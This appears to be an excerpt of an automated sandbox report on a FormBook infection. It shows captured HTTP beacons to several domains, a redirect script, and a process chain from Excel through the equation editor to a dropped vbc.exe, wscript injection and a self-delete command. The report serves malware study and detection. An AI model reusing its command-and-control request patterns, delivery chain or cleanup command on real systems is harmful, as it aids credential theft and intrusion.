7b 74 72 79 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 61 73 73 69 67 6e 28 72 29 3b 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 7d 74 72 79 20 7b 76 61 72 20 6d 61 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6d 65 74 61 22 29 3b 6d 61 72 2e 68 74 74 70 45 71 75 69 76 20 3d 20 22 72 65 66 72 65 73 68 22 3b 6d 61 72 2e 63 6f 6e 74 65 6e 74 20 3d 20 22 30 3b 75 72 6c 3d 22 2b 72 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6d 61 72 29 3b 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 7d 7d 20 65 6c 73 65 20 7b 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 29 3b 73 2e 69 64 3d 22 65 63 6f 64 65 22 3b 73 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 72 2e 73 6c 69 63 65 28 31 29 29 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 3b 7d 7d 69 66 20 28 22 66 65 74 63 68 22 20 69 6e 20 77 69 6e 64 6f 77 29 20 7b 74 72 79 20 7b 66 65 74 63 68 28 61 73 20 2b 20 70 20 2b 20 22 2f 31 22 2c 20 7b 63 72 65 64 65 6e 74 69 61 6c 73 3a 20 22 69 6e 63 6c 75 64 65 22 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 72 29 20 7b 69 66 20 28 21 72 2e 6f 6b 29 20 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 35 30 78 22 29 3b 7d 72 65
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="x-ua-compatible" content="IE=edge"><title></title><script type="text/javascript">(function() {var p = ".eJwNzbsOgjAAQNF_6eBkwIAWYsIAPkAgMWh8xMVUKBQsFMqjoPHf7XiGm_sFPc_BGqjJZGYqmAPEs1a6XFo-edcNudcutMNZCu3RsbjIfI72n0etXrXG7LUzKeBJ36yMWzTVH8_w0KGwt2FQpFVH8LgLJhbZ3UVATXcXznHQXfHKLEt-OE4xx1yuJAhru2eFSiwphFCQrFk1tWjIKcVlniQUtzFhjCoxK8HvD_aCPRo:1m6aYv:iv-UH9q9k3LP5OpCzUl2wRT42jg", as = "http://www.anthonysavillemiddleschool.com/mtm/async/";function d(n){window.location.href = "http://www42.anthonysavillemiddleschool.com/"+n;}function ar(r) {if (r.slice(0, 1) !== ".") {try {window.location.assign(r);} catch (err) {}try {var mar = document.createElement("meta");mar.httpEquiv = "refresh";mar.content = "0;url="+r;document.getElementsByTagName("head")[0].appendChild(mar);} catch (err) {}} else {var s = document.createElement("span");s.id="ecode";s.appendChild(document.createTextNode(r.slice(1)));document.getElementsByTagName("body")[0].appendChild(s);}}if ("fetch" in window) {try {fetch(as + p + "/1", {credentials: "include"}).then(function(r) {if (!r.ok) {throw Error("50x");}re


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:24:43.004930019 CEST | 202 | OUT | GET /dy8g/?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL HTTP/1.1
Host: www.envisionfordheights.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:24:43.281547070 CEST | 202 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.16.1
Date: Thu, 22 Jul 2021 15:24:43 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: https://storymaps.arcgis.com/stories/c29b9f6d46004afda7c8a39378498384?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49170 | 64.227.87.162 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:24:48.561279058 CEST | 203 | OUT | GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=qBaU/+yaefHhIJkiEPofXU4iidVfFInHYvzb5F8Pi5TSlEQo4YuA2EgGVMsttPV3rTFjAQ== HTTP/1.1
Host: www.melodezu.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:24:48.751496077 CEST | 204 | IN | HTTP/1.1 404 Not Found
Date: Thu, 22 Jul 2021 15:24:48 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 278
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49171 | 62.149.128.40 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:24:53.925981998 CEST | 205 | OUT | GET /dy8g/?f6AxB=DyFQJ288GFHSDaRVmYvFextRb5KpVMjfJi9S0KMeos3/VwrcWYQUkgom+EPLcL1jkg9ePA==&m4=JhkpqhXpG6AL HTTP/1.1
Host: www.scuolatua.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:24:53.990124941 CEST | 206 | IN | HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Thu, 22 Jul 2021 15:24:53 GMT
Connection: close
Content-Length: 5045
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.22 | 49172 | 217.160.0.194 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:24:59.119234085 CEST | 211 | OUT | GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=DD+fNAxrYhECY6o7Z2Ot8DQee/pwekPiIII0s/Xm/SYWktVPhnSE8TJmgfkAm9V0KaSOdQ== HTTP/1.1
Host: www.theshapecreator.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:24:59.167316914 CEST | 211 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 22 Jul 2021 15:24:59 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 17:22:47
Start date: 22/07/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13fab0000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:23:08
Start date: 22/07/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:23:11
Start date: 22/07/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x400000
File size: 188889 bytes
MD5 hash: 57F3AE2842FFB5CEEA386D0B97A52818
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 17:23:11
Start date: 22/07/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x400000
File size: 188889 bytes
MD5 hash: 57F3AE2842FFB5CEEA386D0B97A52818
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:23:15
                                                                                                                                                          Start date:22/07/2021
                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                          Imagebase:0xffca0000
                                                                                                                                                          File size:3229696 bytes
                                                                                                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:23:30
                                                                                                                                                          Start date:22/07/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                          File size:141824 bytes
                                                                                                                                                          MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:23:35
                                                                                                                                                          Start date:22/07/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x4a6c0000
                                                                                                                                                          File size:302592 bytes
                                                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis
